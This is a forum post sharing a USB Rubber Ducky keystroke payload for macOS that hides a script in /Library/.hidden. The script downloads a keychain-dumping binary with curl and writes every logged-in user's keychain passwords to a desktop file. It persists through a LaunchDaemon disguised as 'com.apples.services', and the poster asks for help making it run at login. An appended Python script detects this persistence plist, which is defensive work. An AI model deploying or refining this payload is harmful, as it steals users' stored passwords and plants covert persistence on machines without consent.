DuckDump - The Mac Keychain Dump Payload To Recover Passwords

I was trying to take advantage of a project called KeychainDump that extracts OS X Keychain decryption keys from RAM to dump passwords, but am having an issue. First off, the source can be found on https://github.com/IsaiahJTurner/duckdump. I compiled the keychaindump binary myself, but feel free to compile it on your own if you don't trust mine. The issue I am having is that OS X launchd never seems to run. If I run the script manually, it works, but I want it to run automatically as soon as the user logs in. Any help?

Partially Inspired By: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor

REM Isaiah Turner
REM This tool will automatically dump all passwords stored in the keychain to a file on the desktop upon login.
REM Please do not use this for evil, this is for educational purposes only.
REM http://isaiahjturner.com
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200

STRING echo '#!/bin/sh
ENTER
STRING curl -o /Library/.hidden/keychaindump 'https://raw.githubusercontent.com/IsaiahJTurner/keychaindump/master/keychaindump'
ENTER
STRING chmod +x /Library/.hidden/keychaindump
ENTER
STRING w -h | sort -u -t'"' '"' -k1,1 | while read user etc
ENTER
STRING do
ENTER
STRING homedir=$(dscl . -read /Users/$user NFSHomeDirectory | cut -d'"' '"' -f2)
ENTER
STRING /Library/.hidden/keychaindump $homedir/Library/Keychains/login.keychain > $homedir/Desktop/$user.login.keychain.txt
ENTER
STRING done' > /Library/.hidden/dump.sh
ENTER
DELAY 500


STRING chmod +x /Library/.hidden/dump.sh
ENTER
DELAY 200


STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200


STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/dump.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500


STRING chmod 644 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200


STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
Edited by IsaiahJTurner
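A defender-side check for the persistence mechanism in the post above, added here as an example (not part of the original post or the duckdump project): it parses a launchd property list shaped like the one the payload writes to /Library/LaunchDaemons and flags the traits a responder would look for (an Apple-lookalike label, a program path under a dot-prefixed directory, an interpreter-launched RunAtLoad job). The sample plist is constructed from the post; the function names are my own.

```python
import os
import plistlib
from pathlib import PurePosixPath

# Constructed sample, shaped like the plist written by the payload above (not taken from a real host).
SAMPLE_PLIST = b"""<plist version="1.0">
<dict>
  <key>Label</key><string>com.apples.services</string>
  <key>ProgramArguments</key>
  <array><string>/bin/sh</string><string>/Library/.hidden/dump.sh</string></array>
  <key>RunAtLoad</key><true/>
  <key>AbandonProcessGroup</key><true/>
</dict>
</plist>"""

INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "osascript"}


def audit_launchd_plist(data):
    """Return a list of findings for one launchd plist (empty list = nothing suspicious)."""
    try:
        job = plistlib.loads(data)
    except Exception as exc:  # malformed plist is itself worth a look
        return [f"unparseable plist: {exc}"]
    findings = []
    label = job.get("Label", "")
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    # Label borrows Apple's reverse-DNS prefix without being a genuine com.apple.* label
    if label.startswith("com.apple") and not label.startswith("com.apple."):
        findings.append(f"lookalike Apple label: {label}")
    # Any argument that lives under a hidden (dot-prefixed) directory
    for arg in args:
        if any(part.startswith(".") for part in PurePosixPath(arg).parts):
            findings.append(f"program path in hidden directory: {arg}")
    # Shell/script interpreter invoked as a RunAtLoad job: unusual for a vendor daemon
    if job.get("RunAtLoad") and args and PurePosixPath(args[0]).name in INTERPRETERS:
        findings.append(f"RunAtLoad job launched via interpreter: {' '.join(args)}")
    return findings


def scan_launch_daemons(directory="/Library/LaunchDaemons"):
    """Audit every .plist in a launchd directory; returns {filename: findings} for flagged files."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            with open(os.path.join(directory, name), "rb") as fh:
                hits = audit_launchd_plist(fh.read())
            if hits:
                results[name] = hits
    return results


if __name__ == "__main__":
    for finding in audit_launchd_plist(SAMPLE_PLIST):
        print("SAMPLE:", finding)
```

Run it as root on a Mac and call `scan_launch_daemons()` to review the real directory; the checks are heuristics, so treat hits as triage leads rather than verdicts.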